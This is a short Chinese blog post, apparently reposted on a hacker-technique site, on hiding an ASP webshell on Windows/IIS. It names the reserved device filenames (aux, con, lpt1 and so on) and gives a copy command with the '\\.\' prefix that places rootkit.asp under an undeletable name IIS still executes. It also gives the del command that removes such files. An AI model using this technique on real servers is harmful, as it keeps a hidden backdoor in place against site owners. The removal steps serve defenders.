记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

webshell中的不死僵尸和隐藏后门的原理以及删除

2013-03-21 11:30

主要是利用系统保留文件名创建无法删除的webshell来隐藏后门。
Windows 下不能够以下面这些字样来命名文件或文件夹:

aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9
但是通过cmd的copy命令即可实现:

D:\wwwroot>copy rootkit.asp \\.\D:\wwwroot\lpt6.chouwazi.com.asp 前面必须有\\.\

已复制1 个文件。

D:\wwwroot>dir
2011-04-25 14:41 <DIR> .
2011-04-25 14:41 <DIR> ..
2011-03-08 22:50 42,756 aux.asp
2009-05-02 03:02 9,083 index.asp
2012-03-08 22:50 42,756 rootkit.asp

这类文件无法在图形界面删除,只能在命令行下删除:

del D:\wwwroot>del \\.\D:\wwwroot\lpt6.chouwazi.com.asp

20120411112100511

 

然而在IIS中,这种文件又是可以解析成功的。Webshell中的”不死僵尸隐藏”的 原理就是这样。
作者 臭袜子 blog

知识来源: www.hugtion.com/?p=637

阅读:228296 | 评论:0 | 标签:网络安全 webshell 后门

想收藏或者和大家分享这篇好文章→复制链接地址

“webshell中的不死僵尸和隐藏后门的原理以及删除”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云